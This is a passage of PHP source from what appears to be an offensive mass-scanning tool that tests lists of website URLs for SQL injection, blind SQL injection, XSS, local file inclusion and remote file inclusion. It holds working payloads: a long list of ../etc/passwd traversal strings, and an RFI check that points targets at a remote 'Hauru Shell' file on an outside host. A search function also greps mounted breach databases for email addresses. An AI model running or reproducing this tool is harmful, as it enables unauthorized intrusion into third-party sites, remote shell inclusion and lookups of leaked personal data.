if($cleanHashCode == hash_file(file_get_contents($link))) 862 | { 863 | 864 | if(strpos($link, '=') !== false) { 865 | $urls = array(); 866 | $params = explode("?", $link); 867 | $params = explode("&", $params[1]); 868 | foreach($params as $param) 869 | { 870 | $KeyValuePair = explode("=",$param); 871 | $urls[] .= str_replace($param, $KeyValuePair[0] . "=" . $KeyValuePair[1] . " and 1 = 1", $link); //We should add possibilitys of pre- and suffixes 872 | $urls[] .= str_replace($param, $KeyValuePair[0] . 
"=" . $KeyValuePair[1] . " and 1 = 2", $link); 873 | } 874 | 875 | for($i = 0; $i < count($urls); $i+=2) 876 | { 877 | $true = $urls[$i]; 878 | $false = $urls[$i+1]; 879 | 880 | if($cleanHashCode == hash_file(file_get_contents($true))) 881 | { 882 | if($cleanHashCode != hash_file(file_get_contents($false))) 883 | { 884 | $text = $urls[$i] . "\n"; 885 | $handle = fopen('out/sqli.txt', 'a+'); 886 | fwrite($handle, $text); 887 | fclose($handle); 888 | print "\033[1;37m1\033[0;37m"; 889 | } 890 | else { 891 | print '0'; 892 | } 893 | } 894 | } 895 | } 896 | } 897 | else { 898 | print '0'; 899 | } 900 | } 901 | 902 | function sqli($link) { 903 | if(strpos($link, '=') !== false) { 904 | $linki = array(); 905 | $zmienne = explode("?", $link); 906 | $zmienne2 = explode("&", $zmienne[1]); 907 | foreach($zmienne2 as $zmienna){ 908 | $rozbite = explode("=", $zmienna); 909 | $linki[] .= str_replace($rozbite[0] . "=" . $rozbite[1], $rozbite[0] . "=" . $rozbite[1] . "'", $link); 910 | 911 | } 912 | foreach($linki as $lin) { 913 | $reg = "/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error|SQL command not properly ended|Microsoft SQL Native Client error|Query failed: ERROR: syntax error/i"; 914 | if (preg_match($reg, file_get_contents($lin)) && !preg_match($reg, file_get_contents($link))) { 915 | $text = $lin . "\n"; 916 | $handle = fopen('out/sqli.txt', 'a+'); 917 | fwrite($handle, $text); 918 | fclose($handle); 919 | print "\033[1;37m1\033[0;37m"; 920 | } else { 921 | print '0'; 922 | } 923 | } 924 | } else { 925 | 926 | if(strpos($link, ".php")) { 927 | 928 | $url = $link . 
"'"; 929 | 930 | if(preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error|SQL command not properly ended|Microsoft SQL Native Client error|Query failed: ERROR: syntax error/i", file_get_contents($url))) { 931 | $text = $url . "\n"; 932 | $handle = fopen('out/sqli.txt', 'a+'); 933 | fwrite($handle, $text); 934 | fclose($handle); 935 | print "\033[1;37mI\033[0;37m"; 936 | } else { 937 | print "O"; 938 | } 939 | 940 | } else { 941 | print "O"; 942 | } 943 | 944 | 945 | } 946 | 947 | } 948 | 949 | function xss($link) { 950 | 951 | $all = parse_url($link); 952 | 953 | if(strpos($link, '=') !== false) { 954 | $linki = array(); 955 | $zmienne = explode("?", $link); 956 | $zmienne2 = explode("&", $zmienne[1]); 957 | foreach($zmienne2 as $zmienna){ 958 | $rozbite = explode("=", $zmienna); 959 | $linki[] .= str_replace($rozbite[0] . "=" . $rozbite[1], $rozbite[0] . "=" . urlencode("'>\">"), $link); 960 | } 961 | foreach($linki as $lin) { 962 | if (strpos(file_get_contents($lin), "")) { 963 | $text = urldecode($lin) . "\n"; 964 | $handle = fopen('out/xss.txt', 'a+'); 965 | fwrite($handle, $text); 966 | fclose($handle); 967 | print "\033[1;37m1\033[0;37m"; 968 | } else { 969 | print '0'; 970 | } 971 | } 972 | } 973 | 974 | else { 975 | 976 | $all = parse_url($link); 977 | 978 | $url = $link . "'>\">"; 979 | 980 | if(strpos(url_get_contents($url), "")) { 981 | $text = $url . 
"\n"; 982 | $handle = fopen('out/xss.txt', 'a+'); 983 | fwrite($handle, $text); 984 | fclose($handle); 985 | print "\033[1;37mI\033[0;37m"; 986 | } else { 987 | print 'O'; 988 | } 989 | 990 | } 991 | } 992 | 993 | 994 | function clear() { 995 | 996 | print "\n File: "; 997 | $whichf = fopen ("php://stdin","r"); 998 | $file = fgets($whichf); 999 | $file = trim($file); 1000 | if(file_exists('out/'.$file)) { 1001 | 1002 | passthru('sort out/'.$file.' | uniq >> out/clear-'.$file); 1003 | print "\nDone! Saved as clear-".$file."\n"; 1004 | 1005 | } else { 1006 | print "\nFile doesn't exist!\n"; 1007 | } 1008 | } 1009 | 1010 | function lfi($link) { 1011 | 1012 | $lfi = array( 1013 | "%2Fetc%2Fpasswd", 1014 | "..%2Fetc%2Fpasswd", 1015 | "..%2F..%2Fetc%2Fpasswd", 1016 | "..%2F..%2F..%2Fetc%2Fpasswd", 1017 | "..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1018 | "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1019 | "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1020 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1021 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1022 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1023 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1024 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1025 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 1026 | "%2Fetc%2Fpasswd%00", 1027 | "..%2Fetc%2Fpasswd%00", 1028 | "..%2F..%2Fetc%2Fpasswd%00", 1029 | "..%2F..%2F..%2Fetc%2Fpasswd%00", 1030 | "..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1031 | "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1032 | "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1033 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1034 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1035 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1036 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1037 | 
"..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00", 1038 | "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" 1039 | ); 1040 | 1041 | 1042 | if(strpos($link, '=') !== false) { 1043 | $linki = array(); 1044 | $zmienne = explode("?", $link); 1045 | $zmienne2 = explode("&", $zmienne[1]); 1046 | foreach($zmienne2 as $zmienna){ 1047 | foreach($lfi as $vuln) { 1048 | $rozbite = explode("=", $zmienna); 1049 | $linki[] .= str_replace($rozbite[0] . "=" . $rozbite[1], $rozbite[0] . "=" . $vuln, $link); 1050 | } 1051 | foreach($linki as $lin) { 1052 | if (preg_match("/root:x:/", file_get_contents($lin))) { 1053 | $text = $lin . "\n"; 1054 | $handle = fopen('out/lfi.txt', 'a+'); 1055 | fwrite($handle, $text); 1056 | fclose($handle); 1057 | print "\033[1;37m1\033[0;37m"; 1058 | break; 1059 | } else { 1060 | print '0'; 1061 | } 1062 | } 1063 | } 1064 | } else { 1065 | print 'O'; 1066 | } 1067 | 1068 | } 1069 | 1070 | function rfi($link) { 1071 | 1072 | if(strpos($link, '=') !== false) { 1073 | $linki = array(); 1074 | $zmienne = explode("?", $link); 1075 | $zmienne2 = explode("&", $zmienne[1]); 1076 | foreach($zmienne2 as $zmienna){ 1077 | $rozbite = explode("=", $zmienna); 1078 | $linki[] .= str_replace($rozbite[0] . "=" . $rozbite[1], $rozbite[0] . "=https://devilteam.pl/hauru.txt?", $link); 1079 | } 1080 | foreach($linki as $lin) { 1081 | if (strpos(file_get_contents($lin), "Hauru Shell")) { 1082 | $text = $lin . 
"\n"; 1083 | $handle = fopen('out/rfi.txt', 'a+'); 1084 | fwrite($handle, $text); 1085 | fclose($handle); 1086 | print "\033[1;37m1\033[0;37m"; 1087 | } else { 1088 | print '0'; 1089 | } 1090 | } 1091 | } else { 1092 | print '0'; 1093 | } 1094 | 1095 | } 1096 | 1097 | function show() { 1098 | 1099 | print "\n File: "; 1100 | $show = fopen ("php://stdin","r"); 1101 | $sfile = fgets($show); 1102 | $sfile = trim($sfile); 1103 | 1104 | if(file_exists('out/'.$sfile)) { 1105 | 1106 | print "\n\nContent of ".$sfile.":\n"; 1107 | print file_get_contents('out/'.$sfile); 1108 | } else { 1109 | print "\nFile doesn't exist!\n"; 1110 | } 1111 | } 1112 | 1113 | function cmd() { 1114 | 1115 | print "\n Command: "; 1116 | $exec = fopen ("php://stdin","r"); 1117 | $cmd = fgets($exec); 1118 | print passthru(escapeshellcmd($cmd)); 1119 | 1120 | } 1121 | 1122 | function search() { 1123 | 1124 | $path='/path/to/databases'; 1125 | 1126 | if(file_exists($path)) { 1127 | 1128 | print "\n Mail: "; 1129 | $mail = fopen ("php://stdin","r"); 1130 | $email = fgets($mail); 1131 | $email = trim($email); 1132 | 1133 | if($email == 'showdbs') { 1134 | 1135 | print passthru('wc -l '.$path.'*'); 1136 | 1137 | } else { 1138 | 1139 | printf("\n\n"); 1140 | 1141 | if ($handle = opendir($path)) { 1142 | while (false !== ($entry = readdir($handle))) { 1143 | if ($entry != "." && $entry != "..") { 1144 | 1145 | $f=0; 1146 | 1147 | $fp = fopen($path.$entry, 'a+'); 1148 | flock($fp, 1); 1149 | while(!feof($fp)) 1150 | { 1151 | $linia = fgets($fp, 2048); 1152 | $f=$f+1; 1153 | $profunkcjaglobusa = stripos($linia, $email); 1154 | if ($profunkcjaglobusa !== false) 1155 | { 1156 | echo $linia; 1157 | echo 'Found in: ' .$entry. 
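', in line ' .$f;
                            printf("\n...\n");
                        }
                    }
                }
            }
            closedir($handle);
        }
    }
} else {
    print "\nDatabases not mounted.\n";
}
}


/**
 * Print session info: the operator's public IP and country, the local time,
 * whether the database directory is mounted, and a per-file line count of out/.
 *
 * Both the IP lookup and the geolocation lookup are plain-HTTP calls to third
 * parties, so their responses are treated as untrusted: the returned address
 * must validate as an IP before it is placed in the second request, and the
 * geolocation answer is fetched as JSON and json_decode()d instead of being
 * unserialize()d (unserialize() on attacker-influenceable bytes can instantiate
 * arbitrary classes in this process).
 */
function stats() {

    $ip = file_get_contents('http://bot.whatismyipaddress.com/');
    $geoarr = null;

    // Only a bare, well-formed address is forwarded; anything else is reported as unknown.
    if ($ip === false || filter_var(trim($ip), FILTER_VALIDATE_IP) === false) {
        $ip = 'Dunno';
    } else {
        $ip = trim($ip);
        $geourl = "http://www.geoplugin.net/json.gp?ip=" . urlencode($ip);
        $georesp = file_get_contents($geourl);
        if ($georesp !== false) {
            $geoarr = json_decode($georesp, true);
        }
    }

    $country = '';
    if (is_array($geoarr) && isset($geoarr['geoplugin_countryName'])) {
        $country = $geoarr['geoplugin_countryName'];
    }

    if(!$country){
        $country = "Dunno";
    }

    print "\n\nInfo:\n";
    print " IP - ".$ip." (".$country.")\n";
    print " Time - ".date('j/y - G:i')."\n";
    print " Database's mounted: ";
    if(is_dir('/path/to/databases')) {
        print "Yes\n";
    } else { print "No\n"; }

    print "\nFiles:\n";
    if(!file_exists('out')) {
        // Native mkdir() rather than passthru('mkdir out'): no shell is involved.
        if (mkdir('out')) {
            print "\n Output directory created.";
        } else {
            print "\n Could not create output directory.";
        }
    } elseif($handle = opendir('out')) {
        $total = 0;
        while (false !== ($entry = readdir($handle))) {
            if ($entry == "." || $entry == "..") {
                continue;
            }
            $entryPath = 'out/' . $entry;
            // file() returns false for a subdirectory or unreadable entry, and
            // count(false) is a TypeError on PHP 8 -- treat such entries as 0 lines.
            $lines = is_file($entryPath) ? file($entryPath) : false;
            $n = ($lines === false) ? 0 : count($lines);
            print " - ".$entry." (".$n.")\n";
            $total = $total + $n;
        }
        print "\nTotal lines - ".$total;
        closedir($handle);
    } else {
        print "\nNo such directory.";
    }
}

/**
 * Prompt for a check name and a file under out/, then call the matching check
 * function (sqli, blind_sqli, xss, lfi, rfi) for every line of that file.
 * Each prompt reads from a freshly opened php://stdin handle; the file name is
 * trimmed but otherwise used as typed.
 */
function scan() {

    print "\n Options:\n";
    print " sqli - SQL Injection\n";
    print " blind_sqli - Blind SQL Injection\n";
    print " xss - Cross Site Scripting\n";
    print " lfi - Local File Inclusion\n";
    print " rfi - Remote File Inclusion\n";
    print " all - Fuck shit up\n";
    print " What: ";

    $choice = fopen ("php://stdin","r");
    $what = fgets($choice);

    print "\n File: ";

    $choicef = fopen ("php://stdin","r");
    $whatf = fgets($choicef);
    $whatf = trim($whatf);

    if(file_exists('out/'.$whatf)) {

        if(trim($what) == 'sqli' || trim($what) == 'all' || trim($what) == 'sqli&xss') {
            print "\n\n - Testing SQL Injection for " .count(file('out/'.$whatf)). " parameters ($whatf)\n";
            $urls = file('out/'.$whatf);
            foreach($urls as $link) {
                sqli(urldecode($link));
            }
        }

        if(trim($what) == 'blind_sqli' || trim($what) == 'all' || trim($what) == 'blind_sqli&xss' || trim($what) == 'sqli&blind_sqli&xss') {
            print "\n\n - Testing Blind SQL Injection for " .count(file('out/'.$whatf)). " parameters ($whatf)\n";
            $urls = file('out/'.$whatf);
            foreach($urls as $link) {
                blind_sqli(urldecode($link));
            }
        }

        if(trim($what) == 'xss' || trim($what) == 'all' || trim($what) == 'sqli&xss') {
            print "\n\n - Testing Cross Site Scripting for " .count(file('out/'.$whatf)). " parameters ($whatf)\n";
            $urls = file('out/'.$whatf);
            foreach($urls as $link) {
                xss(urldecode($link));
            }
        }

        if(trim($what) == 'lfi' || trim($what) == 'all' || trim($what == 'lfi&rfi')) {
            print "\n\n - Testing Local File Inclusion for " .count(file('out/'.$whatf)). " parameters ($whatf)\n";
            $urls = file('out/'.$whatf);
            foreach($urls as $link) {
                lfi(urldecode($link));
            }
        }

        if(trim($what) == 'rfi' || trim($what) == 'all' || trim($what == 'lfi&rfi')) {
            print "\n\n - Testing Remote File Inclusion for " .count(file('out/'.$whatf)). " parameters ($whatf)\n";
            $urls = file('out/'.$whatf);
            foreach($urls as $link) {
                rfi(urldecode($link));
            }
        }

    } else {
        print "\nFile doesnt exist!\n";
    }
}


options();

// Interactive command loop. A single stdin handle serves the whole session
// (previously php://stdin was reopened on every prompt and never closed), and
// end of input (Ctrl-D / closed pipe) now ends the session instead of looping
// on an empty prompt forever, since fgets() returns false and trim(false) == ''.
$handle = fopen ("php://stdin","r");

while (true) {

    print "\n\n >> ";
    $line = fgets($handle);

    if ($line === false) {
        echo "Aborting!\n";
        exit;
    }

    // Commands are case-sensitive; unrecognised input just redisplays the prompt.
    switch (trim($line)) {
        case 'exit':
            echo "Aborting!\n";
            exit;
        case 'help':
            options();
            break;
        case 'dork':
            dork();
            break;
        case 'cmd':
            cmd();
            break;
        case 'massurl':
            massurl();
            break;
        case 'brutefpds':
            brutefpds();
            break;
        case 'clear':
            clear();
            break;
        case 'stat':
            stats();
            break;
        case 'show':
            show();
            break;
        case 'top':
            top();
            break;
        case 'search':
            search();
            break;
        case 'multibruter':
            multibruter();
            break;
        case 'geturl':
            geturl();
            break;
        case 'filter':
            filter();
            break;
        case 'scan':
            scan();
            break;
        case 'fpds':
            fpds();
            break;
    }
}

?>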